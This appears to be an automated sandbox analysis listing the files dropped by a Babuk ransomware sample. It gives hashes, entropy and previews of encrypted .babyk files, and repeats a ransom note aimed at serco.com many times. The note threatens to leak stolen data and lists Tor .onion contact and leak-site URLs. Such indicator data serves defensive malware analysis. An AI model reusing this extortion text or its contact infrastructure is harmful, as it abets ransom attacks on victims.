                                                                            SHA-512:DD8FA1DC5F58E5D0D80B22E00C967652AFAC01D44B33110573597DC6EE3264B42647F7E7E7E8A9D452D5DF7B399F0D3C95412234398D12EEFC95F5CA137AD71D
                                                                            Malicious:true
                                                                            Preview: .6g..-...k...S.....(...........e.k...>..4k ..i6..6..5.o..)..g....k4... 75....zT.k..V........s.*f.XGL.a0..2p..D..:.C.\.{/...,... .4..$ro:.s%...ep;.........9B..*...s......$D..dPM4u..J9..D../..8.Vf.,."....;...8....d.c.o....s.]...8@...n..E..[...=n. :..fd....9.....6.....%.".M..B.......~.JV....&.X.v..},....K.M...........b.....7...)sYn1j.uo..1.....s....54~......;..6(..%..*..IP*..JO~'.KS.R.n..{B.....b.E....$....H.7...e.....a..Z...^.M:$....SEAt..2.1:?...?wZ].<W....k.#.. ...?...(.1..<nt..1.D..f.>.q.#.l..^.C..HD7.is/n\.%...E.....Z4....f"9...&.*.):.,.%2.Y&..K..5.._.k..u...T.YV*{.n{..^.5..."].-e.......5..,.a..}...A|...>h.....9..#M...m......l.w.I@.\..'.l.(.#w./`M...[.z.mL..Qh..eG.6..L...}cDrj*.M?.TK.:kbc.|.....~...&[...q.oc..\P..&..@jH![..N...&.5.1....~>.rOR$;\..h..<..K..$..@C..f...t..Z.y.f.?1........>....\.w.o.m.D^z....;.y...a6........h"..H.5..w..........q.........!..:...(..J+.~./m...X..O...cl...../..{.e.|....z....[.5K+...'..).N.-.J<0,..z26.!.`.BVD
                                                                            C:\Users\user\AppData\Local\Adobe\Acrobat\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):766
                                                                            Entropy (8bit):7.7511344243421885
                                                                            Encrypted:false
                                                                            SSDEEP:12:cr8QSUPADAQN+g4rihFKveZ67A4zpH8khY8nHJswBfFScYF+3E8Nrd38yzVW3J/w:cVS3MOdjvQ04zqkhhpsw1Od85d38yzYI
                                                                            MD5:E754EECD721E3885B13ED6BAA0E03F31
                                                                            SHA1:C08ED1656638F10D4F454C02CB102EEC3D2A2AB6
                                                                            SHA-256:1CCCFEB09E6511F0627A5B6DA58F41ECDDC15D00D62151672DAEC7D1866BFEDA
                                                                            SHA-512:2C8EA352C25E8F3536C074868EEDA73F6B4C048E100022CE148E56FB51B7FA5E2D4443573612A70202B42CB8BE8AB6DEF425EF10EC575144AACE542D243A3563
                                                                            Malicious:false
                                                                            Preview: F.If.#........N.U..uI....?ye,..P.N!U.G......y...n.....y.G3.s.0....... l..g.&.y...7m*..........Ll.6uu..cJ.Ta...3....0U....G..*.\..>.G.i.....K.~....`#.)y...k.))..D"K.W....h.9Q.g....hW#.N.uR.)aD.Un.WW.b.o..*/`..D...Z^)..8..m..`n..C.n.h..n...,....`..k...{_.....Z..x#i....t....C...9...DU\..U+).0...3P.<.5I..-.....T........R......zJ.p1."........f..v..........Gj..8...h}2....s..H..N..T..bJ.......z..+.r3.uD.....7.v.o- .8...].e.|p.=.P...c2...G)Vc.5..a......7C....L.R.....}*X.l.IH.\...'o.4.$i..]s......h$E....>/.(N..2...&..E.[p_S...{gnT..VK1.....a...q^..q.~o.bw..}((Sg.'.........(..}rY+`.l.V.*...jC.m. ..T5.....d..=c.}.~ZZ...K.......d......}.._.}<,.A5./.'..f+Z..Fqc.\....{..o.M.ezm.4..eR..E]...Sj....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Adobe\Color\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\Color\Profiles\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Adobe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Comms\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.973430635830403
                                                                            Encrypted:false
                                                                            SSDEEP:192:lZ3+86U9bI0FyIaV3wBvzIYE9KdqH66kpSKtX+XLAy6:lZyUS6yjy8o6USqyky6
                                                                            MD5:893BCC84CB9E22BD7404B785C10F2D98
                                                                            SHA1:65E7958EB6C9B63E4AD1F4BEE0BFAEBB648D56FA
                                                                            SHA-256:389B8D4BBB371979E711A144D11CC2E377D6E9AB366AACF0B4B059A3893B0C8D
                                                                            SHA-512:BE3F9F853390073183F8B1B1704C0DE93D55C3A416995FA6AFE5163ED7C1A057C04D21644A7AB189E0E9D3C98DB7C51E449D18B61B5C14B73B58AFD5876C583D
                                                                            Malicious:false
                                                                            Preview: h.&.4.W9.0u]K{.....0..7.s.5}.B.1O.p......`....m.g.9S.....K....ri......v..a..KU.>...!..<:.#.G..p...[..X....#..$2....#AI...VM}...Z..QzA.I?..?.....).{._....F>Q.I...4O6%`.%.A.^....hH..q:..[.6.....d...K..l..^....z...c......P4.....8r.<.!...5.G.M.A.1<#h..jKJ~..]..d........E.'.v....t.7..\.]'7$..b.f?..Y.Q...-B|.........n9E.#.[AA.A......e...;.......t>.CC...Ij}?..d..Jr..u..m....2.Cr....l.6.`..F`Z>.t.y...k.{D.....68....=g.p..r.......}C.t...).#...k^...6..u.O.|....^.....Q.x.Q..:._...h...%..?...vB..:.v..=...f.:^.H.....o-U_..qI..w....u.R.uGtF;z.....!.6..R....v..Qf.<.sa..Dk'4d&{.Z......#/.y.h.v.yu.;....U...Z.lT. .....*....!.:.Q....... .7LC..mw..E....+..5.\)y.;.E=Qe.....6.Z.:M..d........L6.;.v...........QE.".).|..3....@.7....e`R......-...z.U.?........Cy..c..f..K\.y.........s...........?.A...E,.......3....h.;..fz.z.F.[...x#g...\..#D..k.J.=m..^...FZO...u.`.}.a....t;=...9Z...$...]V0!.g....,.(g./0...C..`..............'....eX..,....I...6.%f.I...k.....r`4_.\
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.9998408373383825
                                                                            Encrypted:true
                                                                            SSDEEP:24576:waUpb2h/GDGzPabrord4sVk6P1Mkyeqy3NlGVXt2:jSOrPKrop4sVvPifY6t2
                                                                            MD5:DC3D39C111FCE7C9C5BE052071CE5758
                                                                            SHA1:50FC41BD9326691D7B52FCD3C01568A274F3AE63
                                                                            SHA-256:30A4B319B873AF355E46A90B88618ED930A725F0E4BC28601E4BD9821A59EE46
                                                                            SHA-512:8EFD0FBB6A91176D221DBA1F7A34A94FD61F82D4FE95914D86B48A75B46A0455692267815700245C0DBD9209221CE813AAE6916863D8D3F421ABC414B353C4B0
                                                                            Malicious:true
                                                                            Preview: .......J<"...M.et.J..8.L...B...C.<...t.@1.6..R9.G"1C...l.s......(../<......R. j...^......c...i......Bt.....QF0.=.v.LPaL..4K.<....*<:.7....S)...h..)"(.....O...Qz.T.....G..\m..>..7.odF.=.M\.#..d.`.5..........j..9.|...3)8...W@l.00Fx.6l5..k..m%..x...M..F...@*gJ..&.....H.w)k..t...>\E.O.y.[...US.`...g.a....M.a.S.j....I=..IV..@h.I=..1.a}.av...8g...N....*Q.>m.L.....#...}S.X..+...q..d.?..BFnyG..~........~Fvw.........3.v/.2.l.8..o.....\....z.".l..z+.....h.xov.p....~.!."..).v.S..v...6.P#.1%.8......).6.d.o...trk..q.....].....nZ..........K..w..p.t..F!!.......z!..m..yX8.I.....(.U.W...@z....o....$6Z......@y1.q.$....Sl._K.....H..:.6.{.......Q..p.Pf..&.Qy...xD%.........C.GqK..X.....n...[p.kR.zk.a=...>....,.L.7W5..6.3...........C.C'.L..+W.Q.~.zJt...U.%......Iaa4.A..%0.;..e........k.........(4.~.N.uT.XI,+.....Y'....pu....s....m...H.A.p..V.6.c.h.g.m..9.....t.W".(V.......s:..o......@.Ou.0......e....@d...0+ 0|.G/..M..a!......c.N...AN.:.zI6....Xt[...V1'.b..m..6
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999815359243783
                                                                            Encrypted:true
                                                                            SSDEEP:24576:SZBPbxtUHg9c3SFksZX/hTcY+qtVQuhFb1UZaN0rwCWV:SXPbAHgYmkO/iCQuhx6lc
                                                                            MD5:0CBE9F68B539D33444986E6F2659E7A9
                                                                            SHA1:0F365560A0C82B00E5E081F7B7885B73CA211937
                                                                            SHA-256:BD37BFBB56E6999271462F7ACAC2DA7610D20ACB65CCCD8917C86019E4B35A4C
                                                                            SHA-512:1DC7FAFB51548D03D6814C5A54C4E081A10BD0210ED05853A9B98586A7CCEECF90F6BF3FB6F763C4691279FBF4443B9042DBABEB5FCF0BC408D179E261BE8FCE
                                                                            Malicious:true
                                                                            Preview: .;.=...0<...T.\...x............=.....J..v..RG...F..;O..9...E.k...).g..q..f.y.^.....S..-C#.J.h..`......SWaL.mM.... Ta....<$h.id.........5.I.D.e......tto.:.....c..^......b....$....nW...`lXi9.......9..../.....#..9..8....._...C.E?..r..B}.8..%..j.Z`(...LM.?g....../..0p.....5E.K=4..5..a.09..@.$.....O..\kF.=+..4... .%...8...j.....O.....$.O.).=.^K..1\..1..........M*..-.:.....`(.42....-._.#.0u.cw.......I.1LL...). 7l.E.c1.3UJ..O.t..S..&....E.N./b..3...@.........h.,Y.H2L....bx_.E.qp1 .o.g.......<..?..7.B1i..>...........2C.R............Qxe....v.'..<lI..7,`.B.=....'v.d*......W........1O$../.7.....{.JhW).>..s..%...JZ.K..}M\.&!..8.......<+.].T.a.}u........m%!*..)|a...+B..$.W<..u3....M...ZL..j..C.U.\......|..Vn.G..G..Z`..."B..aX..Z.@......=..cY..$~.qZp....).%.lt.....7.2.B...H.W..'..?]....~.SO..Zbjt.C.../.e..M. \#...b....Q.cx.x...O.Ev.N..5..!f<W.+d..^..p../.^...W..Eo. d.}..:O.....=...KG...u.:.u.Z.Cr.M......AG.0..)6....\...W!hI)<.....=.6.D..I1Q."0......}<....
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999824269258601
                                                                            Encrypted:true
                                                                            SSDEEP:24576:olwbgi0TUDNowRbbIyr2oEsWXy5sUW8aMs4Fui9Eyjq:lKgDNoEbONi5O8xs4F99EQq
                                                                            MD5:B50E0D38038B7512F11527BB749CAB19
                                                                            SHA1:57D2783E3E09DCA053F4FE5EB69C0A69C3EC49F4
                                                                            SHA-256:41A18C527EF3431DF8D3A9E70ADEEAD245715CBCB2B38BF4D70D4C7456383440
                                                                            SHA-512:927DEDA1A3C5DC5FB3F875BAE2879B44CD7D9138C572E1F11A18057E9EDE3965DF9CD3863F981F32A9DDE0ECF679203C7CB0A4C71FE9C6A125CC8BBDC86FE491
                                                                            Malicious:true
                                                                            Preview: j..U..4.'....)q.7..J7..~1e.j.GY.44.i9..k..?\....#..,..........T. q.i..==k-Y.]./...$nI,...c..C~m..$'.m^.yB.YZ....O..k9......CL7..)..*w...A}..cvz8lx.TO...w.L+$;...~.~.....~....;...p2...T.6.Jv6...^..zC.....=hY.tndx.V.0F.V3....2VL.X....R..fkP..[.-..?..!q..4..b-k...@n...^.....=.k...h7JL.f8W..2[e...}..6t..?...cv^......y....5lB&.6a.aW......F.....:.qn....a.....#...|...Ig..l..(......7..4.<.+/...P.....j..6..%....<QR.........1.(.e...u..G......=l?5...Y.._.........M?.9b.......e...<..)rq.ID........Ix.....:~...D.sk&......(...<...E.)_..UHJ......n..'..!I...F<.>iM?..p.`.e0...W.J...8..(S.3?....\....U.....m.h.R.79.0...O3.?/~..{..m.D.B......{b..,...#..b.gbm..l.J.m...I!q............n.E..;...".(.-f.Y...u.<..;...}...5..G=.|.~+...R..f..?.`.;...`.....8.6.+.F..q...?<gf.....A.....8.s.....G.8..O....:.Y.6....Z.e..?..nh.&i..5$FJ=.....8.... 5..x.....Y~~i.R4-..$y.x.>...]..C...xPv00yw.....F.]...U....:....1.@..h.w@.@7Tu..0.:e9o.]zY".BL.."......l3.u.T....!E....RsA....&.T.EJ.e?..g$
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\data\AggregateCache.uca.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.599632141519615
                                                                            Encrypted:false
                                                                            SSDEEP:3:aWGNt3nCD2u2ExOE0ez832kr1CRgmYhRNS3h900ZwDjc9UxNvEEn:aWGdCDH2Ej832NYhgKyMjc90vtn
                                                                            MD5:44BD1893A9388DC54CC766FF5CFFE022
                                                                            SHA1:A770C5826650E71A2AF2B1A6BE2DE72A6293E3E0
                                                                            SHA-256:013333605A9F2F9962B00C8580681A520FC833210DF91AA13EE5152415639D30
                                                                            SHA-512:6123FB394F4B659604A3CC3FCF6CABB2A25144A5C08037318594B56473B95351F22716CCDC60A605C398FA2C962D096D6766148C59E0B6EE7A5E683C5C026E57
                                                                            Malicious:false
                                                                            Preview: bj....... ..u..t.>2...'.dn.Y.4_.y.v...k...{ lY.Q&..Z.t.r.....c.#...da.=..O...`..t5.....y.....=.Fag.|.Hw..x..K.6LN....~$.*....?.1).l....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2157
                                                                            Entropy (8bit):7.905921609289494
                                                                            Encrypted:false
                                                                            SSDEEP:48:AGd7xBnBq+RP/WL6SXnljYzt/bG5hYs/NJ:AG9DntSXntuqh1/NJ
                                                                            MD5:1A4D838242678107AC77241A12F8E79F
                                                                            SHA1:9EDCB1A6B0B40BFB7B07485A3D5941A73895F776
                                                                            SHA-256:D50CBFA1586C9ED580B7821D428EF4839B3270813A6B45FD421256E24DB03D71
                                                                            SHA-512:8CCBDF6669B799D082FC45737A159521023F0856224DD241FF77B6637BFE84582FAE23A363FB8DC852C91F7BC56DDF9A8532596AFBC2CC68B174CC40079CBCE2
                                                                            Malicious:false
                                                                            Preview: h...Z&7K....B.7...lU.....e../[.....c..+.F_D&..z4EW2v.u...e.M.^.p...gV.%.......v.......i.c...z3.g...go.+.v]./.......i..Y ).Lx......<.cm..t..7......Q..].Ki.....UA2KwCblFOd9.........H...s..dKxt.d.uF2(...5.........G...@.K\G0I.*..l.T8.....KU...7...8yf.U..9._.x.J9.4........U.v_+[.P.=...}...=.;..c...*].........D.[X.Ndj..5J.. ........P....TI+@-$X.a...<.....\U..y..+.*D.o;V.q............8x(.v.l...Q... U.65..-.....8....e6....i:h.....ts.$..'|..0..J..d..7.en.N2i.>K.$Y...M..M.".5..t>.QV....fA]... O.o..&.8.E..$.y=D.z.I...=.`d.Sj...B#..Tsd......8.F..:w..6...laG.0B..._.<....V.3..........<0.9.<_.1pt..m.}.8..;F.c...7........-~..1..N......v5.M...........^.M9.|....w....G,1z.. .r^<d.#.j.X.X;.M_...@+X.M...?fx....|.M....%5N..2............raL....u<..t.~..@^Z....pT...JteeF...qT.&..c...<..._.....J...E..R.a.X.......q.V..F.f1. ....nT..9_\..H.x<......l.H.c.jr...:z.{....f...n.@.j....7&.y....ba7_.,..8&....1......,\.......u.&.aB..*}.>...2.L.%...S..d.p..X..}DmWr.
                                                                            C:\Users\user\AppData\Local\ConnectedDevicesPlatform\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
